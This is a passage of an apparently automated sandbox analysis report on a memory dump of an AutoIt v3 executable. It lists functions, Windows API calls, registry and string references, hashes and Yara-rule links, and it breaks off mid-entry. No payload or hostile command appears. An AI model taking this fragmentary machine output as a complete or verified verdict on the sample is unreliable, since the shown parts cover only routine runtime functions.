Strings

TaskbarCreated, xrefs: 009C3725

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: adfa2656d338e5af6694a90be4e137c5f05fc9ae1a37fb2a4a7d66b102505b8a
Instruction ID: d38ba08c4ab5cc4eadf3df5a7f4d952f5946c27da8c811d3195d2e7583cc5ed2
Opcode Fuzzy Hash: adfa2656d338e5af6694a90be4e137c5f05fc9ae1a37fb2a4a7d66b102505b8a
Instruction Fuzzy Hash: 13416DB6A04105BFEF14AFB4ED0AFB93759E740300F14C52DF606862A1DB699E1197A3

Uniqueness

Uniqueness Score: -1.00%

Function 009C3778, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 268COMMON

Download Yara Rule

Strings

CMDLINE, xrefs: 009C3834
/ErrorStdOut, xrefs: 009C388F
CMDLINERAW, xrefs: 009C380D
/AutoIt3ExecuteLine, xrefs: 009C38B9
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 009C37C0
/AutoIt3OutputDebug, xrefs: 009C38A4
/AutoIt3ExecuteScript, xrefs: 009C38CE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLibraryLoadModuleName
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1159719554-3513169116
Opcode ID: 78a671cf4feed84f421775a7248d563e355dab8d93e637e168c7c430d63c5b5b
Instruction ID: 81f14771cf8f21e833aca6d18f11f62469e58ec82aaeb63e3b4013b3a766d0f0
Opcode Fuzzy Hash: 78a671cf4feed84f421775a7248d563e355dab8d93e637e168c7c430d63c5b5b
Instruction Fuzzy Hash: C8A15E71D1022DAADB04EBA0CC95FEEB778BF94340F04452DF416A7192EF755A09CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009C71EB, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A862F8,?,009C37C0,?), ref: 009C4882

Part of subcall function 009E074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,009C72C5,?,?,?,?,009C108C,?), ref: 009E0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,009C108C,?), ref: 009C7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,009C108C,?), ref: 009FECF1
RegQueryValueExW.ADVAPI32(?,Include,?,?,?,?,00000000,?,?,?,?,009C108C,?), ref: 009FED32
RegCloseKey.ADVAPI32(?,?,?,?,?,009C108C,?), ref: 009FED70

Strings

\, xrefs: 009FEDEC
\Include\, xrefs: 009C72C5
Include, xrefs: 009FECE8, 009FED29
Software\AutoIt v3\AutoIt, xrefs: 009C72FE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 338900592-2727554177
Opcode ID: a6df569219e33545d66497feeb556f3f77e0f44c0fcd3f415bf8e0145e6398eb
Instruction ID: f40142c9f72cc1af5b808953d2fae70cd06ae6db78dbc0d2b5ced05f60361b07
Opcode Fuzzy Hash: a6df569219e33545d66497feeb556f3f77e0f44c0fcd3f415bf8e0145e6398eb
Instruction Fuzzy Hash: 177169724083059EC314EFA5EC81AAFBBE8FF95350B50492EF545831B1EB31D949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009C3A58, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 009C3A62
LoadCursorW.USER32(00000000,00007F00), ref: 009C3A71
LoadIconW.USER32 ref: 009C3A88
LoadIconW.USER32 ref: 009C3A9A
LoadIconW.USER32 ref: 009C3AAC
LoadImageW.USER32 ref: 009C3AD2
RegisterClassExW.USER32 ref: 009C3B28

Part of subcall function 009C3041: GetSysColorBrush.USER32(0000000F), ref: 009C3074
Part of subcall function 009C3041: RegisterClassExW.USER32 ref: 009C309E
Part of subcall function 009C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009C30AF
Part of subcall function 009C3041: InitCommonControlsEx.COMCTL32(?), ref: 009C30CC
Part of subcall function 009C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009C30DC
Part of subcall function 009C3041: LoadIconW.USER32 ref: 009C30F2
Part of subcall function 009C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009C3101

Strings

AutoIt v3, xrefs: 009C3B17

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: AutoIt v3
API String ID: 423443420-1704141276
Opcode ID: b6f3c3c15e7a724a83fc302d99aa9911f45a3433944fe6b7ffe084a461c4a97d
Instruction ID: b7a382885ebbba2ca03c22320660a0954a79e6c494764ab09c12fd429736ce0d
Opcode Fuzzy Hash: b6f3c3c15e7a724a83fc302d99aa9911f45a3433944fe6b7ffe084a461c4a97d
Instruction Fuzzy Hash: 0C214AB5E00308AFEB10CFE4EC09BEE7FB4EB48311F00416AF504A62A0D3BA15468F50

Uniqueness

Uniqueness Score: -1.00%

Function 009F0857, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 220COMMON

Download Yara Rule

APIs

__sopen_s.LIBCMT ref: 009F0ABF

Strings

ccs, xrefs: 009F0A01
UTF-16LE, xrefs: 009F0A59
UTF-8, xrefs: 009F0A3A
kernel32.dll, xrefs: 009F0A3F, 009F0A5E, 009F0A7D
UNICODE, xrefs: 009F0A78

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: __sopen_s
String ID: UNICODE$UTF-16LE$UTF-8$ccs$kernel32.dll
API String ID: 2693426323-1222751567
Opcode ID: 1aef6b0d690256cd57cb33c83e67fec0c1dae5521e6a36249ed7b81c8c26a9b2
Instruction ID: ddd145332d91e03278855e9c780374055f90ba7667657fc17cfd1dde5f8dd89f
Opcode Fuzzy Hash: 1aef6b0d690256cd57cb33c83e67fec0c1dae5521e6a36249ed7b81c8c26a9b2
Instruction Fuzzy Hash: A061F672D4530EEAFF344E5598497396A9CABD0350F24482AEF89A7183F6F9CDC08791

Uniqueness

Uniqueness Score: -1.00%

Function 009C39E7, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 009C3A15
CreateWindowExW.USER32 ref: 009C3A36
ShowWindow.USER32(00000000,?,?), ref: 009C3A4A
ShowWindow.USER32(00000000,?,?), ref: 009C3A53

Strings

edit, xrefs: 009C3A30
AutoIt v3, xrefs: 009C3A0D, 009C3A12, 009C3A13

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 594c5d7d96b670dfc9df24e19a785785dab917d5687aa5587938fad18581a31a
Instruction ID: 75748ce3bad1b9ed16533f40f1846b9f973d7bda58e77e182649ea0c3eb69561
Opcode Fuzzy Hash: 594c5d7d96b670dfc9df24e19a785785dab917d5687aa5587938fad18581a31a
Instruction Fuzzy Hash: 48F03A74A402907EFA3097A36C08FA73E7DE7C7F51B00006AB900A6170E2A60802CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 009F809E, Relevance: 9.6, APIs: 6, Instructions: 646COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009F8355
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 009F836F
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009F8392
CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 009F83A4
CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 009F876A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009F8796

Part of subcall function 009F0D2D: FindCloseChangeNotification.KERNELBASE(00000000,00A4FB24,00000109,?,009F8469,00A4FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009F0D7D
Part of subcall function 009F0D2D: GetLastError.KERNEL32(?,009F8469,00A4FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009F0D87

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Close$Handle$ChangeFileFindNotificationType
String ID:
API String ID: 688622981-0
Opcode ID: a3a6f9953d2a5c9b92006b2581ce975fc99344dedd579a430b2228f17bb370e0
Instruction ID: cac431d66acdfd742c34f262dfa5d2fada6bf5c6a889f1462802a92acb6361e0
Opcode Fuzzy Hash: a3a6f9953d2a5c9b92006b2581ce975fc99344dedd579a430b2228f17bb370e0
Instruction Fuzzy Hash: 5322457290410EAFEF659FA8DC46BFF7B68EB45320F244629E620A62E1DF358C51C750

Uniqueness

Uniqueness Score: -1.00%

Function 009F7F4D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000401,?,?,?,00000000,00000109), ref: 009F7F66
GetProcAddress.KERNEL32(00000000), ref: 009F7F6D
CreateFileW.KERNELBASE(?,?,?,?,?,?,00000000,00000401,?,?,?,00000000,00000109), ref: 009F7FCB

Strings

kernel32.dll, xrefs: 009F7F61
CreateFile2, xrefs: 009F7F5C

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateFileHandleModuleProc
String ID: CreateFile2$kernel32.dll
API String ID: 2580138172-1988006178
Opcode ID: b311af79ff99410d52cec3e57ad19a97ed9bd9e6b73039bcfdb9da1aec0ee0e2
Instruction ID: 222b90e9d55d5a88ba12b08d417d36647e7677cbe7cc90d39a7a15385e7dbb02
Opcode Fuzzy Hash: b311af79ff99410d52cec3e57ad19a97ed9bd9e6b73039bcfdb9da1aec0ee0e2
Instruction Fuzzy Hash: AB11E27690010EEFCF01DFE4DC05AEE7BB9FB08362F104519FA14A61A0C77696219BA1

Uniqueness

Uniqueness Score: -1.00%

Function 009EB1AD, Relevance: 8.3, APIs: 5, Instructions: 825COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e3ab4a73d23ce0d14599cd4b1226b651bb3251664ef22af37a374a0b1118220
Instruction ID: 8937e551f1fe3a7d31d533ead3f50a41fee72c87b8dd48c1e60042ea6b9f5e89
Opcode Fuzzy Hash: 1e3ab4a73d23ce0d14599cd4b1226b651bb3251664ef22af37a374a0b1118220
Instruction Fuzzy Hash: 2D6293F1D002A99EDF268F1ACC847AAB7B8EB44314F1445EAD648E7291E7345EC1CF58

Uniqueness

Uniqueness Score: -1.00%

Function 009E2EC8, Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(00000004,00000001,00000000,?,?,009E2EA5,?,00A7BB50,0000000C,009E2F8B,?,?,009C8AED,009FB80A,00A4FB84,?), ref: 009E2EDB
DecodePointer.KERNEL32(?,?,009E2EA5,?,00A7BB50,0000000C,009E2F8B,?,?,009C8AED,009FB80A,00A4FB84,?,00000000,00000001,?), ref: 009E2EE6
EncodePointer.KERNEL32(00000000,?,?,009E2EA5,?,00A7BB50,0000000C,009E2F8B,?,?,009C8AED,009FB80A,00A4FB84,?,00000000,00000001), ref: 009E2F4D
EncodePointer.KERNEL32(?,?,?,009E2EA5,?,00A7BB50,0000000C,009E2F8B,?,?,009C8AED,009FB80A,00A4FB84,?,00000000,00000001), ref: 009E2F5B
EncodePointer.KERNEL32(00000004,?,?,009E2EA5,?,00A7BB50,0000000C,009E2F8B,?,?,009C8AED,009FB80A,00A4FB84,?,00000000,00000001), ref: 009E2F67

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Encode$Decode
String ID:
API String ID: 1898114064-0
Opcode ID: e4ae6d997ea16630bc5a05c0e394bedfc90cb272329eaafd6bb7218724806283
Instruction ID: c23c3cbb1a63b1ba2b2064297d0684700293f2097d46ecac68e989e70be8d188
Opcode Fuzzy Hash: e4ae6d997ea16630bc5a05c0e394bedfc90cb272329eaafd6bb7218724806283
Instruction Fuzzy Hash: 1111E176A10255AFEB11DFB5ED84DAABBFDFB41390710097AF405D2511EB32EC008B60

Uniqueness

Uniqueness Score: -1.00%

Function 009C69CA, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

Part of subcall function 009C4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009C4F6F

_free.LIBCMT ref: 009FE68C
_free.LIBCMT ref: 009FE6D3

Part of subcall function 009C6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?), ref: 009C6D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 009FE462
Bad directive syntax error, xrefs: 009FE6BB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: dd0d8953b886187a9f368b3da187b987da6bb74aae7416980d0c4b43a733f495
Instruction ID: 028cd28d2da363ffa26a087651ff0499e8521331aeeecc939a70e2b55aa436c9
Opcode Fuzzy Hash: dd0d8953b886187a9f368b3da187b987da6bb74aae7416980d0c4b43a733f495
Instruction Fuzzy Hash: 0C916C7191025DAFCF04EFA4CC91AEDB7B8FF59314B10442EF915AB2A1DB34AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C35B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,00000000,80000001,80000001,?,009C35A1,SwapMouseButtons,00000004,?,MAIN,MAIN), ref: 009C35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00000000,80000001,80000001,?,009C35A1,SwapMouseButtons,00000004,?), ref: 009C35F5
RegCloseKey.KERNELBASE(00000000,?,00000000,80000001,80000001,?,009C35A1,SwapMouseButtons,00000004,?,MAIN,MAIN,?,00A24EB8,?,00A3502E), ref: 009C3617

Strings

Control Panel\Mouse, xrefs: 009C35D2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 9908cea25fe8e8277b900933f8fe21572ac3b377b1803daed5ce6b39a1a73b84
Instruction ID: b52040b786ca4cd9656fd59586adab3ded20f77300d00509fec88c595dc01232
Opcode Fuzzy Hash: 9908cea25fe8e8277b900933f8fe21572ac3b377b1803daed5ce6b39a1a73b84
Instruction Fuzzy Hash: 4D114875A10209BEDB208FA9DE45EFE7BBCEF81344F018569F805D7210E2329F419B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A297E5, Relevance: 6.2, APIs: 4, Instructions: 163COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A2992C
_free.LIBCMT ref: 00A29933
_free.LIBCMT ref: 00A2999E

Part of subcall function 009E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009E9C64), ref: 009E2FA9
Part of subcall function 009E2F95: GetLastError.KERNEL32(00000000,?,009E9C64), ref: 009E2FBB

_free.LIBCMT ref: 00A299A6

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f5c50ab3b746495a2e0efd69b664fa918f696bba1c758bbcd619e875f0b5560f
Instruction ID: 52e33b2ffc8ba2b709fefc14a2c46ec667a3501cf2b90e0bc848a362b287125f
Opcode Fuzzy Hash: f5c50ab3b746495a2e0efd69b664fa918f696bba1c758bbcd619e875f0b5560f
Instruction Fuzzy Hash: 2C514DB1D04258AEDF149F64DC85BAEBB79EF48310F1004AEF648A7241DB716E80CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00A23C66, Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00A4FAC0), ref: 00A23CA0
GetLastError.KERNEL32 ref: 00A23CAF
CreateDirectoryW.KERNELBASE(?), ref: 00A23CBE
CreateDirectoryW.KERNEL32(?,?,00000000,000000FF,00A4FAC0), ref: 00A23D1B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 99fbee87b957976d42dccc540839309e14fb3d4673bca76ca4131adc0a2fa25d
Instruction ID: fb7c20ee15d24ed4c99d11289dcdf3b7f0d2c09373ea166eae599ba63d5eee3c
Opcode Fuzzy Hash: 99fbee87b957976d42dccc540839309e14fb3d4673bca76ca4131adc0a2fa25d
Instruction Fuzzy Hash: 3D2194765083119F8700DF28D8809AAB7E4EE97364F144E6DF095C72A2DB359E46CF52

Uniqueness

Uniqueness Score: -1.00%

Function 009C410D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009C41F1
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009FD5EC

Strings

Line: , xrefs: 009FD615

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: IconLoadNotifyShell_String
String ID: Line:
API String ID: 3363329723-1585850449
Opcode ID: 4008a037dad57c511527a10424750fe5cc2e49ef661bff85131aebe7647b7fd1
Instruction ID: cb629209210602a7332c5e55938f7827367fa2cf190f647f3ad32096edacc59d
Opcode Fuzzy Hash: 4008a037dad57c511527a10424750fe5cc2e49ef661bff85131aebe7647b7fd1
Instruction Fuzzy Hash: 3D31D87190C3446EE321EBA0DC56FEBB7ECAF95310F14491EF185920A1EB745649CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00A3CDF1, Relevance: 4.9, APIs: 3, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ca70a62ea2a094334785684826131b7420d8a858fb15ab919c759fbc672c4e
Instruction ID: 024d2cf609894b1d7d31c4d49d2bf5461afa7bd174f14f83d34d9d62ad755254
Opcode Fuzzy Hash: 65ca70a62ea2a094334785684826131b7420d8a858fb15ab919c759fbc672c4e
Instruction Fuzzy Hash: 58F15771A08301DFC714DF28D984A6ABBE5FF89314F14892EF89A9B251D731E945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 009CF8CF, Relevance: 4.7, APIs: 3, Instructions: 172comCOMMON

Download Yara Rule

APIs

Part of subcall function 009E03A2: MapVirtualKeyW.USER32(0000005B), ref: 009E03D3
Part of subcall function 009E03A2: MapVirtualKeyW.USER32(00000010), ref: 009E03DB
Part of subcall function 009E03A2: MapVirtualKeyW.USER32(000000A0), ref: 009E03E6
Part of subcall function 009E03A2: MapVirtualKeyW.USER32(000000A1), ref: 009E03F1
Part of subcall function 009E03A2: MapVirtualKeyW.USER32(00000011), ref: 009E03F9
Part of subcall function 009E03A2: MapVirtualKeyW.USER32(00000012), ref: 009E0401

Part of subcall function 009D6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009CFA90), ref: 009D62B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009CFB2D
OleInitialize.OLE32(00000000), ref: 009CFBAA
CloseHandle.KERNEL32(00000000), ref: 00A049F2

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 83715f7c97456073772fb2a1e2d22bab1a3ab33e5078c218ce1f839435b32a39
Instruction ID: 93415341141f9db42ab48f568db04c4d98103e9ed120cb6e3f529c8991165a05
Opcode Fuzzy Hash: 83715f7c97456073772fb2a1e2d22bab1a3ab33e5078c218ce1f839435b32a39
Instruction Fuzzy Hash: 5F8198B49052408FE384EFF9EE55B597BE4FB98308B10813EE059CB262EB35444ACF51

Uniqueness

Uniqueness Score: -1.00%

Function 009C4531, Relevance: 4.6, APIs: 3, Instructions: 69timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009C410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009C41F1

KillTimer.USER32(?,00000001,?,?), ref: 009C45B5
SetTimer.USER32 ref: 009C45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009FD6CE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
